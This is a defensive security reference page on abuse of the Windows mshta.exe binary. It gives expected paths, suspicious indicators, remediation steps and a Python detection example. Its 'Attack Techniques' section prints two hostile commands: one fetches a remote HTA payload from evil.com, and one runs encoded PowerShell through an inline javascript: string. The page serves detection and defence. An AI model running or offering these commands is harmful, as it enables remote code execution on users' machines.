High Risk | Windows | Legitimate | Commonly Abused
mshta.exe (System Utility)

mshta.exe - HTML Application Host Security Analysis

mshta.exe executes HTML Applications (.HTA files). It is a **critical LOLBin** abused to execute remote payloads, bypass application controls, and support phishing attacks. Any network activity or execution from URLs is highly suspicious.

Risk Summary

HIGH priority. mshta.exe executing URLs or remote content is a strong indicator of compromise. Block mshta.exe for non-administrative users if possible.

Overview

What is mshta.exe?

mshta.exe is the Microsoft HTML Application Host, which executes .HTA files.

Security Significance

  • LOLBin: Living-off-the-Land Binary
  • Remote Execution: Can execute HTA from URLs
  • Script Execution: Runs VBScript/JScript
  • Defense Evasion: Bypasses script restrictions

Normal Behavior

| Property | Expected Value |
| --- | --- |
| Path | C:\Windows\System32\mshta.exe |
| Path (32-bit) | C:\Windows\SysWOW64\mshta.exe |
| Usage | Rare in enterprise environments |

Common Locations

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

Suspicious Indicators

| Indicator | Risk |
| --- | --- |
| URL in command line | CRITICAL |
| VBScript/JScript inline | CRITICAL |
| Parent is Office app | CRITICAL |
| Network connections | HIGH |

Abuse Techniques

Attack Techniques

Remote HTA Execution

mshta.exe http://evil.com/payload.hta
mshta.exe "javascript:a=(new ActiveXObject('Wscript.Shell')).Run('powershell -enc ...');"

Phishing Delivery

HTA files are sent via email or downloaded from malicious sites.

Remediation Steps

  1. Block mshta.exe for standard users
  2. Monitor all mshta.exe execution
  3. Analyze command-line arguments
  4. Check for downloaded payloads

Investigation Checklist

  • Check command line for URLs
  • Review parent process
  • Check network connections
  • Analyze any downloaded files
  • Look for persistence mechanisms
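
The indicator ratings and the first three checklist items above can be applied mechanically to process-creation telemetry. The following is an added example, not part of the original page: the event field names, the Office parent list, the REVIEW baseline and the rating for a path mismatch are assumptions, and the sample events are constructed.

```python
import re
from pathlib import PureWindowsPath

# Expected image paths, taken from the Normal Behavior table on this page.
EXPECTED_PATHS = {r"c:\windows\system32\mshta.exe", r"c:\windows\syswow64\mshta.exe"}
# Assumption: illustrative, non-exhaustive set of Office parent process names.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.I)
INLINE_RE = re.compile(r"\b(?:javascript|vbscript):", re.I)
# Assumption: REVIEW is this example's baseline for any mshta.exe run with no indicator.
RANK = {"REVIEW": 0, "HIGH": 1, "CRITICAL": 2}

def triage(event):
    """Rate one process-creation event; returns None if the image is not mshta.exe."""
    image = event["image"].lower()
    if PureWindowsPath(image).name != "mshta.exe":
        return None
    cmd = event.get("command_line", "")
    parent = PureWindowsPath(event.get("parent_image", "")).name.lower()
    findings = []
    if URL_RE.search(cmd):
        findings.append(("CRITICAL", "URL in command line"))
    if INLINE_RE.search(cmd):
        findings.append(("CRITICAL", "inline VBScript/JScript"))
    if parent in OFFICE_PARENTS:
        findings.append(("CRITICAL", "parent is Office app"))
    if event.get("network_connections", 0) > 0:
        findings.append(("HIGH", "network connections"))
    if image not in EXPECTED_PATHS:
        # Assumption: the page gives no rating for a path mismatch; HIGH is chosen here.
        findings.append(("HIGH", "unexpected image path"))
    risk = max((level for level, _ in findings), key=RANK.get, default="REVIEW")
    return risk, [reason for _, reason in findings]

# Constructed sample events; field names are hypothetical, not a real log schema.
SYS = r"C:\Windows\System32\mshta.exe"
SAMPLE_EVENTS = [
    {"image": SYS, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "mshta.exe http://example.test/a.hta", "network_connections": 1},
    {"image": SYS, "parent_image": r"C:\Windows\explorer.exe", "command_line": 'mshta.exe "javascript:close()"'},
    {"image": SYS, "parent_image": r"C:\Windows\explorer.exe", "command_line": r"mshta.exe C:\Tools\inventory.hta"},
    {"image": r"C:\Users\Public\mshta.exe", "command_line": r"mshta.exe C:\Tools\inventory.hta"},
    {"image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["command_line"], "->", triage(ev))
```

A renamed copy of the binary does not match the image-name check; where the telemetry records the executable's original file name from its version resource, match on that field as well.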

MITRE ATT&CK Techniques

Last verified: January 18, 2026